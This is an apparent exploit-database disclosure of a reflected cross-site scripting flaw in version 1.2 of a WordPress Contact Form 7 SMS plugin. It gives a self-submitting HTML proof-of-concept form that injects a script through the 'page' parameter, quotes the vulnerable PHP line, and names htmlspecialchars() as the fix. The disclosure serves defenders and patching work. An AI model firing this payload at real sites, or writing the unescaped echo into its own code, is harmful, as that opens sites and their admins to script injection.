WordPress Contact Form 7 International SMS Integration plugin version 1.2 suffers from a cross site scripting vulnerability.
0b9ec0c731a198bb020a35fd2e3d8722
___________________________________________________
|
| Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________
Exploit :
<html>
<body onload="document.exploit.submit()">
<form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/
cf7-international-sms-integration/includes/admin/class-sms-log-display.php ">
<input type="hidden" name="page" value=""/><script>alert(1)</script>" />
<input type="hidden" name="tab" value="smslogs" />
</form>
</body>
</html>
__________________________________________________
Vulnerable method :
$_GET
Vulnerable File :
wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php
Vulnerable code:
line 366 :
<form id="smslog-filter" method="get" action="<?php echo $current_url; ?> ">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
<input type="hidden" name="tab" value="smslogs" />
<?php $testListTable->display() ?>
</form>
__________________________________________________
#patch:
For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________
Discovered By : M.R.S.L.Y
__________________________________________________